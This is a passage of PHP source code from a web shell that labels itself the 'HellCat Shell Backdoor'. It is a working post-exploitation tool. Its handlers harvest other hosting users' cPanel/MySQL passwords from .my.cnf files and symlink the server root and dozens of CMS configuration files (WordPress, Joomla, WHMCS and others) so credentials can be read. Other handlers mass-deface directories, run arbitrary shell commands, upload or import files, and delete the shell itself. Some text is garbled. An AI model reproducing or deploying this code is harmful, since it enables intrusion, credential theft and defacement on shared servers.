vars("<script>c('?".x5.$dir."/hellcatindonesia');</script>");
}

elseif($_COEG['command'] == 'cookie') {
vars('<div class="coL-panel">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">COOKIES MANAGER

</div>');
vars("<table class='table-info' cellspacing='0'>");
vars("<th class='th-info cookie-td'>Name</th><th class='th-info' style='width:30px'><i class='fa fa-angle-right'></i></th><th class='th-info'>Value</th><tr class='ex-hov'>");
if(count($_COOKIE) != 0) {
foreach($_COOKIE as $c1 => $c2) {
echo "<td class='td-info break'>".$c1."<td class='td-info' style='width:30px'><i class='fa fa-angle-right'></i><td class='td-info break'>".$c2."<tr class='ex-hov'>";
}
vars("");
}
vars('<div class="coL-option" style="padding:7px">');
vars("<td style='text-align:center;width:20px'><span class='label label-default'><i class='fa fa-angle-right'></i></span>

Cookies Found : [ <font color='1D9D73'> ".count($_COOKIE)."</font> ]

</div>");
if(isset($_POST['c3'])) {
if(setcookie($_POST['c3'],$_POST['c2'])) {
success('Cookie Created !!');
mtr('?'.x7.'cookie&'.x5.$dir);
} else {
error('Permission Denied !!');
}
}
echo '';
}

elseif($_COEG['command'] == 'cpanel') {
echo '<div class="coL-panel">
<td class="td-panel"><i class="fa fa-code"></i><td class="td-panel-right">CPANEL FINDER

</div>';
@ini_set('display_errors',0);
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[$i]);
return trim($ar1[0]);
}
$d0mains = @file('/etc/named.conf');
$domains = scandir("/var/named");
if ($domains or $d0mains) {
$domains = scandir("/var/named");
if($domains) {
echo "<table class='table-info' style='width:100%'><th class='th-info'> Domain </th><th class='th-info'> Result</th>";
$count=1;
$dc = 0;
$list = scandir("/var/named");
foreach($list as $domain){
if(strpos($domain,".db")){
$domain = str_replace('.db','',$domain);
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
$dirz = '/home/'.$owner['name'].'/.my.cnf';
$path = getcwd();
if (is_readable($dirz)) {
copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
$p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
$password=entre2v2($p,'password="','"');
echo "
<td class='td-info' style='width:150px'><a href='http://".$domain.":2082' target='_blank'>".$domain."</a>
<td class='td-info'><a class='a' href='".$owner['name'].".txt' target='_blank'>OPEN</a>";
$dc++; }}}
echo '';
$total = $dc;
echo '<div class="coL-option top" style="">Total Cpanel : <span class="label label-default">'.$total.'</span></div>';
}else{
$d0mains = @file('/etc/named.conf');
if($d0mains) {
echo "<table class='table-info' style='width:100%'><th class='th-info'> Domain </th><th class='th-info'> Result </th>";
$count=1;
$dc = 0;
$mck = array();
foreach($d0mains as $d0main){
if(@eregi('zone',$d0main)){
preg_match_all('#zone "(.*)"#',$d0main,$domain);
flush();
if(strlen(trim($domain[1][0])) >2){
$mck[] = $domain[1][0];
} } }
$mck = array_unique($mck);
$usr = array();
$dmn = array();
foreach($mck as $o) {
$infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
$usr[] = $infos['name'];
$dmn[] = $o;
}
array_multisort($usr,$dmn);
$dt = file('/etc/passwd');
$passwd = array();
foreach($dt as $d) {
$r = explode(':',$d);
if(strpos($r[5],'home')) {
$passwd[$r[0]] = $r[5];
}
}
$l=0;
$j=1;
foreach($usr as $r) {
$dirz = '/home/'.$r.'/.my.cnf';
$path = getcwd();
if (is_readable($dirz)) {
copy($dirz, $path.'/'.$r.'.txt');
$p=file_get_contents($path.'/'.$r.'.txt');
$password=entre2v2($p,'password="','"');
echo "
<td class='td-info'><a target='_blank' href=http://".$dmn[$j-1]."/>".$dmn[$j-1]." </a>
<td class='td-info'><a href='".$r.".txt'>OPEN</a> ";
$dc++;
flush();
$l=$l?0:1;
$j++;
}
}
}
echo '';
$total = $dc;
echo '<div class="coL-option top" style="">Total Cpanel : <span class="label label-default">'.$total.'</span></div>';
}
} else{
error('Access Disabled !!');
mtr('?'.x5.$dir);
echo x9;
}
}

elseif($_COEG['command'] == 'massdef') {
echo '<div class="coL-panel">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">HELLCAT MODE

</div>';
echo '<div class="coL-option">';
echo "</div>";
if (isset ($_COEG['base_dir']))
{
if (!file_exists ($_COEG['base_dir'])) {
$alert = "Destination Not Found !";
failed1($alert); }
@chdir ($_COEG['base_dir']) or die ("<script>alert('Cannot Open Directory');</script>");

$files = @scandir ($_COEG['base_dir']) or die ("Oh Shit !!
");
foreach ($files as $file):
if ($file != "." && $file != ".." && @filetype ($file) == "dir")
{
$index = getcwd ()."/".$file."/".$_COEG['file_name'];
if (file_put_contents ($index, $_COEG['index']))
echo "
<div class='coL-option break wrap' style='margin-top:2px;margin-bottom:2px'><span class='label-default'>+</span> Bartes Dwiky </span></div>"; }
endforeach;
}
}

elseif($_COEG['command'] == 'multihash') {
vars('<div class="coL-panel">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">MULTI HASH

</div>');
if($_COEG['encrypt']) {
switch($_COEG['id']) {
case '1':
if(md5($_COEG['text'])) {
vars("<div class='coL-option top'><table style='margin-bottom:3px'>
<td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Text :<td class='break'> ".$_COEG['text']."<td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Md5 :<td class='break'> ".md5($_COEG['text'])."</div>"); } else {
error('Permission Denied !!');
}
break;
case '2':
if(crc32($_COEG['text'])) {
vars("<div class='coL-option top'><table style='margin-bottom:3px'>
<td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Text :<td class='break'> ".$_COEG['text']."<td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Crc32 :<td class='break'> ".crc32($_COEG['text'])."</div>"); } else {
error('Permission Denied !!');
}
break;
case '3':
if(sha1($_COEG['text'])) {
vars("<div class='coL-option top'><table style='margin-bottom:3px'>
<td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Text :<td class='break'> ".$_COEG['text']."<td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Sha1 :<td class='break'> ".sha1($_COEG['text'])."</div>"); } else {
error('Permission Denied !!');
}
break;
case '4':
vars("<div class='coL-option top'><table style='margin-bottom:3px'>
<td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Text :<td class='break'> ".$_COEG['text']."
<td class='td-md5'
style='width:70px'><font color='#1D9D73'>+</font> Md5 :<td class='break'> ".md5($_COEG['text'])."
<td class='td-md5'
style='width:70px'><font color='#1D9D73'>+</font> Crc32 :<td class='break'> ".crc32($_COEG['text'])."
<td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Sha1 :<td class='break'> ".sha1($_COEG['text'])."</div>");
break;
}
}
vars("<div class='coL-option top'>
</div>");
}

elseif($_COEG['command'] == 'symlink') {
echo '<div class="coL-panel">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">MULTI SYMLINK

</div>';
if(is_readable("/etc/named.conf")) {
$named = '<a href="?symlink=named.conf&dir='.$dir.'">OPEN</a>';
} else {
$named = '<font color="red">DISABLED</font>';
}
if(is_readable("/etc/valiases")) {
$valiases = '<a href="?symlink=valiases&dir='.$dir.'">OPEN</a>';
} else {
$valiases = '<font color="red">DISABLED</font>';
}
if(is_readable("/etc/passwd")){
$passwd = '<a href="?symlink=passwd&dir='.$dir.'">OPEN</a>';
} else {
$passwd = '<font color="red">DISABLED</font>';
}
if(is_readable("/var/named")){
$var = '<a href="?symlink=var&dir='.$dir.'">OPEN</a>';
} else {
$var = '<font color="red">DISABLED</font>';
}
echo '<table class="table-info">';
echo '<th class="th-info">From</th>';
echo '<th class="th-info">Arrow</th>';
echo '<th class="th-info">Action</th>';
echo '';
echo '<td class="td-info"><span class="label-default">+</span> [ /etc/named.conf ]<td class="td-info">»<td class="td-info">'.$named.'</a>';
echo '';
echo '<td class="td-info"><span class="label-default">+</span> [ /etc/valiases ]<td class="td-info"">»<td class="td-info">'.$valiases.'</a>';
echo '';
echo '<td class="td-info"><span class="label-default">+</span> [ /etc/passwd ]<td class="td-info">»<td class="td-info">'.$passwd.'</a>';
echo '';
echo '<td class="td-info"><span class="label-default">+</span> [ /var/named/ ]<td class="td-info">»<td class="td-info">'.$var.'</a>';
echo '';
@mkdir('hellcat',0777);
@symlink("/","hellcat/root");
$htaccss = "Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any";
file_put_contents("hellcat/.htaccess",$htaccss);
$ms_2 = file_get_contents("/etc/passwd");
$ms_2z = explode("\n",$ms_2);

foreach($ms_2z as $ms_3){
$ms_1 = explode(":",$ms_3);
error_reporting(0);

$ms_4 = posix_getcwd();
$dr = explode("/",$ms_4);

symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/wp-config.php',"hellcat/".$ms_1[0].'-WordPress.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/blog/wp-config.php',"hellcat/".$ms_1[0].'-WordPress.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/wp/wp-config.php',"hellcat/".$ms_1[0].'-WordPress.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/site/wp-config.php',"hellcat/".$ms_1[0].'-WordPress.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/config.php',"hellcat/".$ms_1[0].'-PhpBB.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/includes/config.php',"hellcat/".$ms_1[0].'-vBulletin.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/configuration.php',"hellcat/".$ms_1[0].'-Joomla.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/web/configuration.php',"hellcat/".$ms_1[0].'-Joomla.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/joomla/configuration.php',"hellcat/".$ms_1[0].'-Joomla.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/site/configuration.php',"hellcat/".$ms_1[0].'-Joomla.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/conf_global.php',"hellcat/".$ms_1[0].'-IPB.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/inc/config.php',"hellcat/".$ms_1[0].'-MyBB.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/Settings.php',"hellcat/".$ms_1[0].'-SMF.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/sites/default/settings.php',"hellcat/".$ms_1[0].'-Drupal.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/e107_config.php',"hellcat/".$ms_1[0].'-e107.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/datas/config.php',"hellcat/".$ms_1[0].'-Seditio.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/includes/configure.php',"hellcat/".$ms_1[0].'-osCommerce.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/client/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/clientes/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/support/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/supportes/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/whmcs/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/domain/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/hosting/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/whmc/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/billing/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/portal/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/order/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/clientarea/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/domains/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt'); }
}

elseif(isset($_REQUEST['symlink'])){
switch ($_REQUEST['symlink']){
case 'var':
if(is_readable("/var/named")){
echo '<div class="coL-panel">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">SYMLINK [ VAR/NAMED ]

</div>';
echo '<table class="table-info">';
echo '
<th class="th-info">Website</th>
<th class="th-info" style="width:60px">User</th>
<th class="th-info" style="width:40px">Action</th>';
$ms_5 = scandir("/var/named");
foreach($ms_5 as $ms_6){
if(strpos($ms_6,".db")){
$i += 1;
$ms_6 = str_replace('.db','',$ms_6);
$owner = posix_getpwuid(fileowner("/etc/valiases/".$ms_6));

echo "<tr class='ex-hov'>
<td class='td-info break'> <span class='label-default'>+</span> <a href='http://".$ms_6." '>".$ms_6."</a>
<td class='td-info'><font color='#1D9D73'>".$owner['name']."</font>
<td class='td-info'><a href='hellcat/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a>";
}
}
echo "<div class='coL-option' style='padding:7px;margin-top:3px'>
Total Domain : <font color='#1D9D73'>".$i."</font> </div>";
}else{ echo "<td class='td-info'>can't read [ /var/named ]";
}
break;
}

switch ($_REQUEST['symlink']){
case 'passwd':
error_reporting(0);
$etc = file_get_contents("/etc/passwd");
$etcz = explode("\n",$etc);
if(is_readable("/etc/passwd")){
echo '<div class="coL-panel">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">SYMLINK [ ETC/PASSWD ]

</div>';
echo '<table class="table-info">';
echo '
<th class="th-info">Website</th>
<th class="th-info" style="width:60px">User</th>
<th class="th-info" style="width:40px">Action</th>';
$list = scandir("/var/named");
foreach($etcz as $etz){
$etcc = explode(":",$etz);
foreach($list as $domain){
if(strpos($domain,".db")){
$domain = str_replace('.db','',$domain);
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
if($owner['name'] == $etcc[0]) {
$i += 1;
echo "<tr class='ex-hov'><td class='td-info break'> <span class='label-default'>+</span> <a href='http://".$domain." '>".$domain."</a>
<td class='td-info'><font color='#1D9D73'>".$owner['name']."</font>
<td class='td-info'><a href='hellcat/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a>";
}}}}
echo "<div class='coL-option' style='padding:7px;margin-top:3px'>
Total Domain : <font color='#1D9D73'>".$i."</font> </div>";}
break;
}

switch ($_REQUEST['symlink']){
case 'named.conf':
if(is_readable("/etc/named.conf")){
echo '<div class="coL-panel">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">SYMLINK [ ETC/NAMED.CONF ]

</div>';
echo '<table class="table-info">';
echo '
<th class="th-info">Website</th>
<th class="th-info" style="width:60px">User</th>
<th class="th-info" style="width:40px">Action</th>';
$named = file_get_contents("/etc/named.conf");
preg_match_all('%zone \"(.*)\" {%',$named,$domains);
foreach($domains[1] as $domain){
$domain = trim($domain);
$i += 1;
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
echo "<tr class='ex-hov'><td class='td-info break'> <span class='label-default'>+</span> <a href='http://".$domain." '>".$domain."</a><td class='td-info'><font color='#1D9D73'>".$owner['name']."</font><td class='td-info'><a href='hellcat/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a>";
}
echo "<div class='coL-option' style='padding:7px;margin-top:3px'>
Total Domain : <font color='#1D9D73'>".$i."</font> </div>";
} else { echo "<td class='td-info'>can't read [ /etc/named.conf ]"; }
break;
}
switch ($_REQUEST['symlink']){
case 'valiases':
if(is_readable("/etc/valiases")){
echo '<div class="coL-panel">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">SYMLINK [ ETC/VALIASES ]

</div>';
echo '<table class="table-info">';
echo '
<th class="th-info">Website</th>
<th class="th-info" style="width:60px">User</th>
<th class="th-info" style="width:40px">Action</th>';
$list = scandir("/etc/valiases");
foreach($list as $domain){
$i += 1;
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
echo "<tr class='ex-hov'><td class='td-info break'> <span class='label-default'>+</span> <a href='http://".$domain."'>".$domain."</a><td class='td-info'><font color='#1D9D73'>".$owner['name']."</font><td class='td-info'><a href='hellcat/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a>";
}
echo "<div class='coL-option' style='padding:7px;margin-top:3px'>
Total Domain : <font color='#1D9D73'>".$i."</font></div>";
} else { echo "<td class='td-info'>can't read [ /etc/valiases ]"; }
break;
}
}

elseif($_COEG['command'] == 'change') {
vars('<style> .tup { font-size: 14px; } </style>');
vars('<div class="coL-panel">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">CHANGE PASSWORD

</div>');
vars('<script>
function validate(){
var a = document.getElementById("newpass").value;
var b = document.getElementById("confirm").value;
if (a!=b) {');
s('Password Do Not Match !!');
vars('return false;
}
}
</script>');
function xs($file){
return file_get_contents($file);
}
function chipt($plain){
return md5($plain);
}
function changepass($plain){
$npass = chipt($plain);
$npass = "\$pass = \"".$npass."\";";
$con = xs($_SERVER['SCRIPT_FILENAME']);
$con = preg_replace("/\\\$pass\ *=\ *[\"\']*([a-fA-F0-9]*)[\"\']*;/is",$npass,$con);
return file_put_contents($_SERVER['SCRIPT_FILENAME'], $con);
}

if($_COEG['newpass']) {
if(changepass($_COEG['newpass'])) {
success('Password Changed !!');
mtr('?'.x5.$dir.'&'.x7.'logout');
} else {
error('Unable To Change Password !!');
}
}
echo "<div class='coL-option top'>
</div>";
echo '<script>function saveForm(){
if(document.getElementById("newpass").value == ""){';
s('Enter New Password !!');
echo'document.getElementById("newpass").focus();
return false;
}
if(document.getElementById("confirm").value == ""){';
s('Confirm Your Password !!');
echo'return false;
}
document.getElementById("sks").submit();
}
</script>';
}
elseif($_COEG['command'] == 'kill') {
if(file_exists("hellcat_shell.php"))
unlink("hellcat_shell.php");unlink(__FILE__);
success('bye!');
mtr('https://www.hellcatindonesia.net/');
}
elseif($_COEG['command'] == 'renadir') {
$c = $_COEG['e'];
if($_COEG['e']) {
$e = rename($dir, "".dirname($dir)."/".htmlspecialchars($_COEG['e'])."");
if($e) {
vars('<script>c("?'.x5.dirname($dir).'");</script>');
} else {
error('Permission Denied !!');
}
}
vars('<div class="coL-panel">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">RENAME DIRECTORY

</div>');
vars("<div class='coL-option top'>

<i class='fa fa-folder-o fa-3x'></i>

");
vars("</div>");
}
elseif($_COEG['command'] == 'deledir') {
$x0z1 = deledir($dir);
if($x0z1) {
vars("<script>window.location = '?".x5.dirname($dir)."';</script>");
} else {
vars("<script>window.location = '?".x5.dirname($dir)."';</script>");
error('Permission Denied !!');
}
}
elseif($_COEG['command'] == 'about') {
echo '<div class="coL-panel">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">ABOUT ME

</div>';
echo '<div class="coL-option" style="padding:7px">

<i class="fa fa-group fa-4x"></i>

<font size="4px" style="shadow:2px 2px 0px #fff">HELLCAT INDONESIA</font></font>
<i class="fa fa-globe"></i>  http://'.$_SERVER['HTTP_HOST'].'

</div>

<div class="coL-panel top">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">ABOUT

</div>
<table class="table-info">
<tr class="ex-hov">
<td style="width:85px" class="td-info"><span class="label label-default">+</span> Name <td class="td-info">: HellCat Shell Backdoor
<tr class="ex-hov">
<td style="width:85px" class="td-info"><span class="label label-default">+</span> Version <td class="td-info">: 1.3 ( <font color="green">Premium Script</font> )
<tr class="ex-hov">
<td style="width:85px" class="td-info"><span class="label label-default">+</span> Author <td class="td-info">: Bartes Dwiky
<tr class="ex-hov">
<td style="width:85px" class="td-info"><span class="label label-default">+</span> Email <td class="td-info break">: <a class="a" href="mailto:hellcatindonesia@gmail.com">hellcatindonesia@gmail.com</a>
<tr class="ex-hov">
<td style="width:85px" class="td-info"><span class="label label-default">+</span> Instagram <td class="td-info break">: <a class="a" href="https://www.instagram.com/hellcatindonesia">http://instagram.com/hellcatindonesia</a>
<tr class="ex-hov">
<td style="width:85px" class="td-info"><span class="label label-default">+</span> Blog <td class="td-info">: <a class="a" href="https://www.hellcatindonesia.net">http://hellcatindonesia.net/</a>
<div class="coL-option">

Jika ada kesalahan atau ada bug pada shell backdoor kami, Silahkan contact email kami di atas.

— Thanks All —</div>';
}

elseif($_COEG['command'] == 'upload') {
vars('<style> .tup { font-size: 14px; } </style>');
echo '<div class="coL-panel">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">MULTIPLE UPLOAD

</div>';
if(isset($_REQUEST['ufile'])) {
$ufile = $_COEG['ufile'] ;
}
if(isset($_REQUEST['upload'])) {
if($_COEG['upload']){
if(empty($ufile)) {
$cx = $_FILES['file']['name'];
} else {
$cx = $ufile;
}
if(@copy($_FILES['file']['tmp_name'],$dir.'/'.$cx)) {
success('File Uploaded !!');
} else {
error('Upload Failed !!');
} } }
vars('<script language="Javascript">
function cogx(){
if(document.forms[\'upload\'].file.value === "") {');
s('Select Your File !!');
vars('return false;
}
}
</script>');
echo '<div class="coL-option"><span class="label-default">+</span> Upload From Device :<hr>';
echo '</div>';
if($_COEG["submit"]){
$url = trim($_COEG["url"]);
$uname = $_COEG["uname"];
if(empty($uname)) {
$uname = basename($url);
} else {
$uname = $_COEG["uname"];
}
if(op($uname, $url)) {
success('File Uploaded !!');
} else {
error('Failed !!');
}
}
vars('<script language="Javascript">
function cog(){
if(document.forms[\'import\'].url.value === "") {');
s('Enter URL !!');
vars('return false;
}
}
</script>');
echo '<div class="coL-option top"><span class="label-default">+</span> Upload From Internet (Import) :<hr>';
echo '</div>';
}
elseif ($_COEG['command'] == 'system') {
function exe($ms_x) {
if(function_exists('system')) {
@ob_start();
@system($ms_x);
$ms_z = @ob_get_contents();
@ob_end_clean();
return $ms_z;
} elseif(function_exists('exec')) {
@exec($ms_x,$values);
$ms_z = "";
foreach($values as $value) {
$ms_z .= $result;
} return $ms_z;
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($ms_x);
$ms_z = @ob_get_contents();
@ob_end_clean();
return $ms_z;
} elseif(function_exists('shell_exec')) {
$ms_z = @shell_exec($ms_x);
return $ms_z;
}
}
function disk($dz) {
if($dz >= 1073741824)
return sprintf('%1.2f',$dz / 1073741824 ).' GB';
elseif($dz >= 1048576)
return sprintf('%1.2f',$dz / 1048576 ) .' MB';
elseif($dz >= 1024)
return sprintf('%1.2f',$dz / 1024 ) .' KB';
else
return $dz .' B';
}
function fuck($b_ms, $c_ms, $d_ms){
if(strpos($b_ms, $c_ms) === FALSE) return FALSE;
if(strpos($b_ms, $d_ms) === FALSE) return FALSE;
$a_ms = strpos($b_ms, $c_ms) + strlen($c_ms);
$e_ms = strpos($b_ms, $d_ms, $a_ms);
$f_ms = substr($b_ms, $a_ms, $e_ms - $a_ms);
return $f_ms; }
if(get_magic_quotes_gpc()) {
function m_ms($n_ms) {
return is_array($n_ms) ? array_map('m_ms', $n_ms) : stripslashes($n_ms); }
$_COEG = m_ms($_COEG); }

$safemode = (@ini_get(strtolower("safe_mode")) == 'on') ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";

$disablefunc = @ini_get("disable_functions");
$mysql = (function_exists('mysql_connect')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";

$curl = (function_exists('curl_version')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";

$wget = (exe('wget --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";

$perl = (exe('perl --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";

$python = (exe('python --help')) ? "
<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";

$ds_men = (!empty($disablefunc)) ? "<span class='label-danger'>".$disablefunc."</span>" : "<span class='label-success'>NONE</span>";
if(!function_exists('posix_getegid')) {
$c_us = @get_current_user();
$c_id = @getmyuid();
$g_c = @getmygid();
$gr_p = "?";
} else {
$c_id = @posix_getpwuid(posix_geteuid());
$g_c = @posix_getgrgid(posix_getegid());
$c_us = $c_id['name'];
$c_id = $c_id['uid'];
$gr_p = $g_c['name'];
$g_c = $g_c['gid'];
}
echo '<div class="coL-panel">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">SYSTEM INFORMATION

</div>';
echo "<table width=100% class='table-info' cellspacing=0>
<th class=th-info style=width:120px>Component</th>
<th class=th-info>Arrow</th>
<th class=th-info break>Result</th>";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Server <td class='td-info' align='center'>»
<td class='td-info'> ".$_SERVER['SERVER_SOFTWARE']."";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
Username<td class='td-info' align='center'>»
<td class='td-info'> ".$c_us." [".$c_id."]";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
Group<td class='td-info' align='center'>»
<td class='td-info'>".$gr_p." [".$g_c."]";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
Server IP <td class='td-info' align='center'>»
<td class='td-info'>".gethostbyname($_SERVER['HTTP_HOST'])."";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
Your IP <td class='td-info' align='center'>»
<td class='td-info'> ".$_SERVER['REMOTE_ADDR']."";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
PHP Version<td class='td-info' align='center'>»
<td class='td-info'> ".@phpversion()."";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Disk Space <td class='td-info' align='center'>»
<td class='td-info'>[".disk(disk_free_space("/"))."] / [".disk(disk_total_space("/"))."]";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Safe Mode<td class='td-info' align='center'>»
<td class='td-info'> $safemode";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> MySQL<td class='td-info' align='center'>»<td class='td-info'>$mysql";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
Perl<td class='td-info' align='center'>»
<td class='td-info'> $perl ";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Python<td class='td-info' align='center'>»
<td class='td-info'>$python";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> WGET<td class='td-info' align='center'>»
<td class='td-info'>$wget";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> CURL<td class='td-info' align='center'>»<td class='td-info'>$curl";
if(get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") {
echo "<tr class='ex-hov'><td align='left' class='td-info'><span class='label label-default'>+</span> Magic Quotes <td class='td-info' align='center'>»
<span class='label label-success'>ON</span>"; } else { echo "<tr class='ex-hov'><td align='left' class='td-info'><span class='label label-default'>+</span> Magic Quotes <td class='td-info' align='center'>»<td class='td-info'><span class='label label-danger'>OFF</span>"; }
echo "";
echo '<div class="coL-panel top">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">KERNEL

</div>';
echo "<div class ='coL-option' style='margin-bottom:3px;padding:7px'>".Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64."</div>";
echo '<div class="coL-panel top">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">DISABLE FUNCTION

</div>';
echo "<div class='coL-option wrap break' style='padding:7px'>".$ds_men."</div>";
}
elseif($_COEG['command'] == 'error') {
echo '<div class="coL-panel">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">FILE MANAGER

</div>';
error('Permission Denied !!');
echo x9;
} else {
$hc = @getcwd();
if(isset($_COEG['location']))
@chdir($_COEG['location']);
$cwd = @getcwd();
if($os == 'win') {
$hc = str_replace("\\", "/", $hc);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';

function hs($d) {
if(function_exists("scandir")) {
return scandir($d);
} else {
$dh = opendir($d);
while (false !== ($filename = readdir($dh)))
$data[] = $filename;
return $data;
}
}
if(!empty($_COOKIE['msv5']))
$_COOKIE['msv5'] = @unserialize($_COOKIE['msv5']);

if(!empty($_COEG['hcx'])) {
switch($_COEG['hcx']) {
case 'mkdir':
if(!@mkdir($_COEG['p2']))
echo "Can't create new dir";
break;
case 'delete':
function deleteDir($path) {
$path = (substr($path,-1)=='/') ? $path:$path.'/';
$dh = opendir($path);
while ( ($â–Ÿ = readdir($dh) ) !== false) {
$â–Ÿ = $path.$â–Ÿ;
if ( (basename($â–Ÿ) == "..") || (basename($â–Ÿ) == ".") )
continue;
$type = filetype($â–Ÿ);
if ($type == "dir")
deleteDir($â–Ÿ);
else
